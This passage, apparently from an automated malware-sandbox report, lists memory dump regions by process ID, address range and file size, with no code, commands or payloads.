                      4KB

                    • memory/432-50-0x0000000002740000-0x0000000002741000-memory.dmp
                      Filesize

                      4KB

                    • memory/432-35-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/432-70-0x00000000064D0000-0x00000000064D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/432-69-0x00000000058E0000-0x00000000058E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/684-18-0x0000000000000000-mapping.dmp
                    • memory/796-290-0x0000000000610000-0x0000000000661000-memory.dmp
                      Filesize

                      324KB

                    • memory/796-235-0x0000000000600000-0x0000000000601000-memory.dmp
                      Filesize

                      4KB

                    • memory/796-224-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/796-220-0x0000000000000000-mapping.dmp
                    • memory/796-230-0x00000000008D0000-0x00000000008D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/872-21-0x0000000000000000-mapping.dmp
                    • memory/884-268-0x0000000000000000-mapping.dmp
                    • memory/1072-320-0x0000000000000000-mapping.dmp
                    • memory/1140-398-0x0000000004CA0000-0x0000000004CA2000-memory.dmp
                      Filesize

                      8KB

                    • memory/1140-366-0x00000000005C0000-0x00000000005D2000-memory.dmp
                      Filesize

                      72KB

                    • memory/1140-364-0x0000000000570000-0x0000000000571000-memory.dmp
                      Filesize

                      4KB

                    • memory/1140-346-0x0000000000000000-mapping.dmp
                    • memory/1140-350-0x00000000710B0000-0x000000007179E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1140-659-0x0000000000000000-mapping.dmp
                    • memory/1140-391-0x0000000000600000-0x0000000000605000-memory.dmp
                      Filesize

                      20KB

                    • memory/1140-358-0x00000000010A0000-0x00000000010A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1168-20-0x0000000000000000-mapping.dmp
                    • memory/1212-650-0x0000000000000000-mapping.dmp
                    • memory/1212-656-0x0000000000230000-0x0000000000231000-memory.dmp
                      Filesize

                      4KB

                    • memory/1212-647-0x0000000000110000-0x0000000000111000-memory.dmp
                      Filesize

                      4KB

                    • memory/1212-657-0x0000000000000000-mapping.dmp
                    • memory/1212-654-0x0000000000000000-mapping.dmp
                    • memory/1212-649-0x0000000000150000-0x0000000000151000-memory.dmp
                      Filesize

                      4KB

                    • memory/1212-648-0x0000000000000000-mapping.dmp
                    • memory/1216-29-0x0000000000000000-mapping.dmp
                    • memory/1464-354-0x0000000000000000-mapping.dmp
                    • memory/1576-181-0x0000000006600000-0x0000000006601000-memory.dmp
                      Filesize

                      4KB

                    • memory/1576-200-0x0000000006540000-0x0000000006541000-memory.dmp
                      Filesize

                      4KB

                    • memory/1576-22-0x0000000000000000-mapping.dmp
                    • memory/1576-38-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1576-186-0x00000000064D0000-0x00000000064D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1576-216-0x0000000006750000-0x0000000006751000-memory.dmp
                      Filesize

                      4KB

                    • memory/1576-218-0x0000000006760000-0x0000000006761000-memory.dmp
                      Filesize

                      4KB

                    • memory/1624-646-0x0000000000000000-mapping.dmp
                    • memory/1756-5-0x0000000000000000-mapping.dmp
                    • memory/1756-4-0x0000000000000000-mapping.dmp
                    • memory/1776-370-0x00000000005C0000-0x00000000005E3000-memory.dmp
                      Filesize

                      140KB

                    • memory/1776-373-0x0000000000660000-0x0000000000684000-memory.dmp
                      Filesize

                      144KB

                    • memory/1776-343-0x00000000710B0000-0x000000007179E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1776-338-0x0000000000000000-mapping.dmp
                    • memory/1776-349-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1796-0-0x0000000000000000-mapping.dmp
                    • memory/1816-30-0x0000000000000000-mapping.dmp
                    • memory/1816-36-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1816-115-0x0000000006530000-0x0000000006531000-memory.dmp
                      Filesize

                      4KB

                    • memory/1832-11-0x0000000000000000-mapping.dmp
                    • memory/1888-8-0x0000000000000000-mapping.dmp
                    • memory/1900-34-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1900-31-0x0000000000000000-mapping.dmp
                    • memory/1904-10-0x0000000000000000-mapping.dmp
                    • memory/1924-44-0x00000000048B0000-0x00000000048B1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1924-12-0x0000000000000000-mapping.dmp
                    • memory/1924-56-0x0000000005340000-0x0000000005341000-memory.dmp
                      Filesize

                      4KB

                    • memory/1924-37-0x00000000004F0000-0x00000000004F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1924-122-0x00000000066B0000-0x00000000066B1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1924-15-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1964-252-0x0000000006540000-0x0000000006541000-memory.dmp
                      Filesize

                      4KB

                    • memory/1964-16-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1964-253-0x0000000006550000-0x0000000006551000-memory.dmp
                      Filesize

                      4KB

                    • memory/1964-13-0x0000000000000000-mapping.dmp
                    • memory/1984-269-0x0000000000000000-mapping.dmp
                    • memory/2168-362-0x0000000000000000-mapping.dmp
                    • memory/2196-365-0x00000000006B0000-0x00000000006C1000-memory.dmp
                      Filesize

                      68KB

                    • memory/2196-367-0x00000000005C0000-0x00000000005C3000-memory.dmp
                      Filesize

                      12KB

                    • memory/2196-368-0x0000000004A00000-0x0000000004A02000-memory.dmp
                      Filesize

                      8KB

                    • memory/2196-359-0x0000000000E60000-0x0000000000E61000-memory.dmp
                      Filesize

                      4KB

                    • memory/2196-353-0x0000000000000000-mapping.dmp
                    • memory/2196-363-0x0000000000480000-0x0000000000481000-memory.dmp
                      Filesize

                      4KB

                    • memory/2196-357-0x00000000710B0000-0x000000007179E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2260-103-0x0000000000000000-mapping.dmp
                    • memory/2260-174-0x0000000004920000-0x00000000049D0000-memory.dmp
                      Filesize

                      704KB

                    • memory/2260-106-0x0000000070650000-0x0000000070D3E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2260-107-0x0000000000B40000-0x0000000000B41000-memory.dmp
                      Filesize

                      4KB

                    • memory/2260-190-0x0000000000AF0000-0x0000000000AFD000-memory.dmp
                      Filesize

                      52KB

                    • memory/2296-299-0x0000000000417A8B-mapping.dmp
                    • memory/2296-298-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/2296-302-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/2312-109-0x000007FEF6960000-0x000007FEF6BDA000-memory.dmp
                      Filesize

                      2.5MB

                    • memory/2404-118-0x0000000000000000-mapping.dmp
                    • memory/2440-334-0x000000000041A684-mapping.dmp
                    • memory/2440-336-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/2440-333-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/2452-125-0x0000000000000000-mapping.dmp
                    • memory/2476-369-0x0000000000000000-mapping.dmp
                    • memory/2476-384-0x0000000005560000-0x0000000005561000-memory.dmp
                      Filesize

                      4KB

                    • memory/2476-382-0x0000000002750000-0x0000000002751000-memory.dmp
                      Filesize

                      4KB

                    • memory/2476-378-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2476-377-0x0000000002540000-0x0000000002541000-memory.dmp
                      Filesize

                      4KB

                    • memory/2476-374-0x00000000710B0000-0x000000007179E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2480-658-0x0000000000000000-mapping.dmp
                    • memory/2480-128-0x0000000000000000-mapping.dmp
                    • memory/2492-319-0x0000000000000000-mapping.dmp
                    • memory/2504-132-0x0000000000000000-mapping.dmp
                    • memory/2512-655-0x0000000010530000-0x000000001054A000-memory.dmp
                      Filesize

                      104KB

                    • memory/2512-342-0x0000000000000000-mapping.dmp
                    • memory/2512-401-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                      Filesize

                      304KB

                    • memory/2512-642-0x0000000050480000-0x000000005049A000-memory.dmp
                      Filesize

                      104KB

                    • memory/2556-660-0x0000000000000000-mapping.dmp
                    • memory/2560-141-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2560-146-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2560-142-0x000000000043FCC3-mapping.dmp
                    • memory/2604-149-0x0000000000000000-mapping.dmp
                    • memory/2624-155-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2624-157-0x0000000000417A8B-mapping.dmp
                    • memory/2624-160-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2640-153-0x0000000000000000-mapping.dmp
                    • memory/2708-167-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/2708-162-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/2708-164-0x000000000041A684-mapping.dmp
                    • memory/2728-168-0x000000000043FCC3-mapping.dmp
                    • memory/2768-271-0x0000000001F40000-0x0000000001F51000-memory.dmp
                      Filesize

                      68KB

                    • memory/2768-289-0x00000000027D0000-0x00000000027E1000-memory.dmp
                      Filesize

                      68KB

                    • memory/2768-292-0x00000000027D0000-0x00000000027E1000-memory.dmp
                      Filesize

                      68KB

                    • memory/2768-270-0x0000000000000000-mapping.dmp
                    • memory/2784-371-0x0000000000000000-mapping.dmp
                    • memory/2784-379-0x00000000710B0000-0x000000007179E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2876-652-0x0000000000000000-mapping.dmp
                    • memory/2900-177-0x000000000041A684-mapping.dmp
                    • memory/2992-188-0x0000000000000000-mapping.dmp
                    • memory/2992-226-0x0000000002600000-0x0000000002604000-memory.dmp
                      Filesize

                      16KB

                    • memory/3000-283-0x0000000000417A8B-mapping.dmp
                    • memory/3000-288-0x0000000000417A8B-mapping.dmp
                    • memory/3000-191-0x0000000000417A8B-mapping.dmp
                    • memory/3000-276-0x0000000000417A8B-mapping.dmp
                    • memory/3000-278-0x0000000000417A8B-mapping.dmp
                    • memory/3000-277-0x0000000000417A8B-mapping.dmp
                    • memory/3000-279-0x0000000000417A8B-mapping.dmp
                    • memory/3000-280-0x0000000000417A8B-mapping.dmp
                    • memory/3000-281-0x0000000000417A8B-mapping.dmp
                    • memory/3000-282-0x0000000000417A8B-mapping.dmp
                    • memory/3000-284-0x0000000000417A8B-mapping.dmp
                    • memory/3000-285-0x0000000000417A8B-mapping.dmp
                    • memory/3000-286-0x0000000000417A8B-mapping.dmp
                    • memory/3000-287-0x0000000000417A8B-mapping.dmp
                    • memory/3020-539-0x0000000000000000-mapping.dmp
                    • memory/3020-467-0x0000000000000000-mapping.dmp
                    • memory/3020-421-0x0000000000000000-mapping.dmp
                    • memory/3020-423-0x0000000000000000-mapping.dmp
                    • memory/3020-425-0x0000000000000000-mapping.dmp
                    • memory/3020-427-0x0000000000000000-mapping.dmp
                    • memory/3020-429-0x0000000000000000-mapping.dmp
                    • memory/3020-431-0x0000000000000000-mapping.dmp
                    • memory/3020-433-0x0000000000000000-mapping.dmp
                    • memory/3020-435-0x0000000000000000-mapping.dmp
                    • memory/3020-437-0x0000000000000000-mapping.dmp
                    • memory/3020-439-0x0000000000000000-mapping.dmp
                    • memory/3020-441-0x0000000000000000-mapping.dmp
                    • memory/3020-443-0x0000000000000000-mapping.dmp
                    • memory/3020-445-0x0000000000000000-mapping.dmp
                    • memory/3020-447-0x0000000000000000-mapping.dmp
                    • memory/3020-449-0x0000000000000000-mapping.dmp
                    • memory/3020-451-0x0000000000000000-mapping.dmp
                    • memory/3020-453-0x0000000000000000-mapping.dmp
                    • memory/3020-455-0x0000000000000000-mapping.dmp
                    • memory/3020-457-0x0000000000000000-mapping.dmp
                    • memory/3020-459-0x0000000000000000-mapping.dmp
                    • memory/3020-461-0x0000000000000000-mapping.dmp
                    • memory/3020-463-0x0000000000000000-mapping.dmp
                    • memory/3020-465-0x0000000000000000-mapping.dmp
                    • memory/3020-551-0x0000000000000000-mapping.dmp
                    • memory/3020-469-0x0000000000000000-mapping.dmp
                    • memory/3020-471-0x0000000000000000-mapping.dmp
                    • memory/3020-473-0x0000000000000000-mapping.dmp
                    • memory/3020-475-0x0000000000000000-mapping.dmp
                    • memory/3020-477-0x0000000000000000-mapping.dmp
                    • memory/3020-479-0x0000000000000000-mapping.dmp
                    • memory/3020-481-0x0000000000000000-mapping.dmp
                    • memory/3020-483-0x0000000000000000-mapping.dmp
                    • memory/3020-485-0x0000000000000000-mapping.dmp
                    • memory/3020-487-0x0000000000000000-mapping.dmp
                    • memory/3020-489-0x0000000000000000-mapping.dmp
                    • memory/3020-491-0x0000000000000000-mapping.dmp
                    • memory/3020-493-0x0000000000000000-mapping.dmp
                    • memory/3020-495-0x0000000000000000-mapping.dmp
                    • memory/3020-497-0x0000000000000000-mapping.dmp
                    • memory/3020-499-0x0000000000000000-mapping.dmp
                    • memory/3020-501-0x0000000000000000-mapping.dmp
                    • memory/3020-503-0x0000000000000000-mapping.dmp
                    • memory/3020-505-0x0000000000000000-mapping.dmp
                    • memory/3020-507-0x0000000000000000-mapping.dmp
                    • memory/3020-509-0x0000000000000000-mapping.dmp
                    • memory/3020-553-0x0000000000000000-mapping.dmp
                    • memory/3020-513-0x0000000000000000-mapping.dmp
                    • memory/3020-515-0x0000000000000000-mapping.dmp
                    • memory/3020-517-0x0000000000000000-mapping.dmp
                    • memory/3020-519-0x0000000000000000-mapping.dmp
                    • memory/3020-521-0x0000000000000000-mapping.dmp
                    • memory/3020-523-0x0000000000000000-mapping.dmp
                    • memory/3020-525-0x0000000000000000-mapping.dmp
                    • memory/3020-527-0x0000000000000000-mapping.dmp
                    • memory/3020-529-0x0000000000000000-mapping.dmp
                    • memory/3020-531-0x0000000000000000-mapping.dmp
                    • memory/3020-533-0x0000000000000000-mapping.dmp
                    • memory/3020-535-0x0000000000000000-mapping.dmp
                    • memory/3020-537-0x0000000000000000-mapping.dmp
                    • memory/3020-304-0x0000000002810000-0x0000000002814000-memory.dmp
                      Filesize

                      16KB

                    • memory/3020-541-0x0000000000000000-mapping.dmp
                    • memory/3020-543-0x0000000000000000-mapping.dmp
                    • memory/3020-545-0x0000000000000000-mapping.dmp
                    • memory/3020-547-0x0000000000000000-mapping.dmp
                    • memory/3020-575-0x0000000000000000-mapping.dmp
                    • memory/3020-419-0x0000000000000000-mapping.dmp
                    • memory/3020-511-0x0000000000000000-mapping.dmp
                    • memory/3020-555-0x0000000000000000-mapping.dmp
                    • memory/3020-557-0x0000000000000000-mapping.dmp
                    • memory/3020-559-0x0000000000000000-mapping.dmp
                    • memory/3020-561-0x0000000000000000-mapping.dmp
                    • memory/3020-563-0x0000000000000000-mapping.dmp
                    • memory/3020-565-0x0000000000000000-mapping.dmp
                    • memory/3020-567-0x0000000000000000-mapping.dmp
                    • memory/3020-569-0x0000000000000000-mapping.dmp
                    • memory/3020-571-0x0000000000000000-mapping.dmp
                    • memory/3020-573-0x0000000000000000-mapping.dmp
                    • memory/3020-549-0x0000000000000000-mapping.dmp
                    • memory/3020-577-0x0000000000000000-mapping.dmp
                    • memory/3020-579-0x0000000000000000-mapping.dmp
                    • memory/3020-581-0x0000000000000000-mapping.dmp
                    • memory/3020-583-0x0000000000000000-mapping.dmp
                    • memory/3020-585-0x0000000000000000-mapping.dmp
                    • memory/3020-587-0x0000000000000000-mapping.dmp
                    • memory/3020-589-0x0000000000000000-mapping.dmp
                    • memory/3020-591-0x0000000000000000-mapping.dmp
                    • memory/3020-593-0x0000000000000000-mapping.dmp
                    • memory/3020-595-0x0000000000000000-mapping.dmp
                    • memory/3020-597-0x0000000000000000-mapping.dmp
                    • memory/3020-599-0x0000000000000000-mapping.dmp
                    • memory/3020-601-0x0000000000000000-mapping.dmp
                    • memory/3020-603-0x0000000000000000-mapping.dmp
                    • memory/3020-605-0x0000000000000000-mapping.dmp
                    • memory/3020-607-0x0000000000000000-mapping.dmp
                    • memory/3020-609-0x0000000000000000-mapping.dmp
                    • memory/3020-611-0x0000000000000000-mapping.dmp
                    • memory/3020-613-0x0000000000000000-mapping.dmp
                    • memory/3020-615-0x0000000000000000-mapping.dmp
                    • memory/3020-617-0x0000000000000000-mapping.dmp
                    • memory/3020-619-0x0000000000000000-mapping.dmp
                    • memory/3020-621-0x0000000000000000-mapping.dmp
                    • memory/3020-623-0x0000000000000000-mapping.dmp
                    • memory/3020-625-0x0000000000000000-mapping.dmp
                    • memory/3020-627-0x0000000000000000-mapping.dmp
                    • memory/3020-629-0x0000000000000000-mapping.dmp
                    • memory/3020-631-0x0000000000000000-mapping.dmp
                    • memory/3020-633-0x0000000000000000-mapping.dmp
                    • memory/3020-635-0x0000000000000000-mapping.dmp
                    • memory/3020-637-0x0000000000000000-mapping.dmp
                    • memory/3020-639-0x0000000000000000-mapping.dmp
                    • memory/3020-641-0x0000000000000000-mapping.dmp
                    • memory/3020-417-0x0000000000000000-mapping.dmp
                    • memory/3020-643-0x0000000003C80000-0x0000000003C81000-memory.dmp
                      Filesize

                      4KB

                    • memory/3020-644-0x0000000000000000-mapping.dmp
                    • memory/3020-415-0x0000000000000000-mapping.dmp
                    • memory/3020-413-0x0000000000000000-mapping.dmp
                    • memory/3020-411-0x0000000000000000-mapping.dmp
                    • memory/3020-409-0x0000000000000000-mapping.dmp
                    • memory/3020-407-0x0000000000000000-mapping.dmp
                    • memory/3020-405-0x0000000000000000-mapping.dmp
                    • memory/3020-404-0x0000000000120000-0x0000000000121000-memory.dmp
                      Filesize

                      4KB

                    • memory/3020-293-0x0000000000000000-mapping.dmp
                    • memory/3020-402-0x00000000000A0000-0x00000000000A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/3020-403-0x0000000000000000-mapping.dmp
                    • memory/3052-199-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/3052-196-0x000000000043FCC3-mapping.dmp
                    • memory/3052-195-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/3056-330-0x0000000000A70000-0x0000000000A94000-memory.dmp
                      Filesize

                      144KB

                    • memory/3056-310-0x00000000004F0000-0x00000000004F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/3056-307-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
                      Filesize

                      4KB

                    • memory/3056-306-0x0000000072EA0000-0x000000007358E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/3056-303-0x0000000000000000-mapping.dmp
                    • memory/3060-395-0x0000000000000000-mapping.dmp